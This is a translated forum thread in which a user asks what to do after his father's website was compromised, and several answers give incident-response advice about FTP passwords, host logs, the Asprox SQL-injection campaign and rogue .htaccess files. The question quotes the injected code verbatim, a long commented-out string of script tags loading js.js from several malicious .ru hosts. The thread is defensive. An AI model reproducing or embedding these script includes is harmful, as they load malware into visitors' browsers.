Мой сайт взломали .. Что делать?

Мой отец позвонил мне сегодня и сказал, что люди, заходящие на его веб-сайт, получают 168 вирусов, которые пытаются загрузить на свои компьютеры. Он совершенно не технический специалист и все это построил с помощью редактора WYSIWYG.

Я открыл его сайт и просмотрел исходный код, и в нижней части источника прямо перед закрывающим тегом HTML была строка с включенным Javascript. Они включили этот файл (среди многих других): http://www.98hs.ru/js.js <- ВЫКЛЮЧИТЕ JAVASCRIPT ПЕРЕД ПЕРЕХОДОМ ПО ЭТОМУ URL.

Так что я пока это закомментировал. Оказалось, что его пароль к FTP был простым словарным словом из шести букв, так что мы думаем, что именно так его взломали. Мы изменили его пароль на строку из 8+ цифр, не состоящую из слов (он не стал бы использовать кодовую фразу, поскольку он типаж "охота и клевание").

Я сделал whois на 98hs.ru и обнаружил, что он размещен на сервере в Чили. На самом деле с ним также связан адрес электронной почты, но я серьезно сомневаюсь, что этот человек виноват. Наверное, это просто какой-то другой сайт, который взломали ...

Я понятия не имею, что мне делать в данный момент, поскольку я никогда раньше не сталкивался с подобными вещами. У кого-нибудь есть предложения?

Он использовал простую Джейн незащищенный ftp через webhost4life.com. Я даже не вижу способа сделать sftp на их сайте. Думаю, его логин и пароль перехватили?

Итак, чтобы сделать это более актуальным для сообщества, какие шаги вы должны предпринять / лучшие практики, которым вы должны следовать, чтобы защитить свой сайт от взлома?

Для записи, вот строка кода, которая «волшебным образом» была добавлена ​​в его файл (и не находится в его файле на его компьютере - я оставил ее закомментированной, чтобы быть абсолютно уверенной, что она ничего не сделает. на этой странице, хотя я уверен, что Джефф защитится от этого):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

Ответов (8)

Решение

Постарайтесь собрать как можно больше информации. Посмотрите, может ли хост предоставить вам журнал, в котором показаны все FTP-соединения, которые были выполнены с вашей учетной записью. Вы можете использовать их, чтобы узнать, использовалось ли даже FTP-соединение для внесения изменений и, возможно, для получения IP-адреса.

Если вы используете готовое программное обеспечение, такое как Wordpress, Drupal или что-то еще, что вы не кодировали, в коде загрузки могут быть уязвимости, которые допускают такие модификации. Если он построен на заказ, дважды проверьте все места, где вы разрешаете пользователям загружать файлы или изменять существующие файлы.

Второе - сделать дамп сайта как есть и проверить все на предмет других модификаций. Возможно, это всего лишь одна-единственная модификация, которую они сделали, но если они вошли через FTP, кто знает, что еще там наверху.

Верните свой сайт обратно в заведомо исправный статус и, при необходимости, обновите его до последней версии.

Вы также должны учитывать уровень окупаемости. Стоит ли пытаться выследить человека из-за ущерба, или это то, где вы просто живете, изучаете и используете более надежные пароли?

С паролем из шести слов он мог быть подвергнут грубой помощи. Это более вероятно, чем перехват его ftp, но это тоже может быть.

Начните с более надежного пароля. (8 символов все еще довольно слабо)

Посмотрите, будет ли вам полезна эта ссылка на блог о безопасности в Интернете .

Является ли сайт простым статическим HTML? т.е. ему не удалось закодировать страницу загрузки, которая позволяет любому проезжающему мимо загружать скомпрометированные скрипты / страницы?

Почему бы не спросить у webhost4life, есть ли у них какие-либо журналы FTP, и не сообщить им о проблеме. Мало ли, они могут быть очень восприимчивыми и узнать для вас, что именно произошло?

Я работаю на общего хостера, и мы всегда приветствуем такие отчеты, и обычно можем определить точный вектор атаки и посоветовать, где клиент сделал ошибку.

Вы упомянули, что ваш отец использовал инструмент для публикации веб-сайтов.

Если средство публикации публикует данные со своего компьютера на сервер, возможно, его локальные файлы чисты, и ему просто нужно повторно опубликовать на сервере.

Он должен увидеть, есть ли другой метод входа на его сервер, чем простой FTP, хотя ... это не очень безопасно, потому что он отправляет его пароль в виде открытого текста через Интернет.

Я знаю, что это немного поздно, но URL, упомянутый для JavaScript, упоминается в списке сайтов, которые, как известно, были частью возрождения ботов ASPRox, начавшегося в июне (по крайней мере, тогда мы были отмечены как Это). Некоторые подробности об этом упомянуты ниже:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Самое неприятное в том, что фактически каждое поле типа varchar в базе данных «заражено», чтобы выплюнуть ссылку на этот URL-адрес, в котором браузер получает крошечный iframe, который превращает его в бота. Базовое исправление SQL для этого можно найти здесь:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Однако пугает то, что вирус просматривает системные таблицы в поисках значений, которые нужно заразить, и многие планы общего хостинга также разделяют пространство базы данных для своих клиентов. Так что, скорее всего, был заражен даже не сайт вашего отца, а чей-то другой сайт в его хостинговом кластере, который написал некачественный код и открыл дверь для атаки SQL Injection.

Если он еще не сделал этого, я бы отправил СРОЧНОЕ электронное письмо их хосту и дал бы им ссылку на этот код SQL, чтобы исправить всю систему. Вы можете исправить свои собственные затронутые таблицы базы данных, но, скорее всего, боты, выполняющие заражение, снова пройдут через эту дыру и заразят всю партию.

Надеюсь, это даст вам больше информации для работы.

РЕДАКТИРОВАТЬ: Еще одна быстрая мысль: если он использует один из инструментов онлайн-дизайна хоста для создания своего веб-сайта, весь этот контент, вероятно, находится в столбце и был заражен таким образом.

Очевидно, нас взломали одни и те же парни! Или в нашем случае ботов. Они использовали SQL-инъекцию в URL на некоторых старых классических сайтах ASP, которые больше никто не поддерживает. Мы нашли атакующие IP-адреса и заблокировали их в IIS. Теперь мы должны провести рефакторинг всего старого ASP. Итак, я советую сначала взглянуть на журналы IIS, чтобы определить, связана ли проблема с кодом вашего сайта или конфигурацией сервера.

Отключите веб-сервер, не выключая его, чтобы избежать сценариев выключения. Проанализируйте жесткий диск через другой компьютер как диск с данными и посмотрите, сможете ли вы определить виновника с помощью файлов журналов и тому подобного. Убедитесь, что код безопасен, а затем восстановите его из резервной копии.

Это случилось недавно с моим клиентом, размещенным на ipower. Я не уверен, что ваша среда хостинга была основана на Apache, но если бы вы обязательно дважды проверяли файлы .htaccess, которые вы не создавали, особенно над корневым веб-каталогом и внутри каталогов изображений, поскольку они имеют тенденцию вводить туда некоторую гадость также (они перенаправляли людей в зависимости от того, откуда они пришли в ссылке). Также проверьте все, что вы создали, на предмет наличия кода, который вы не писали.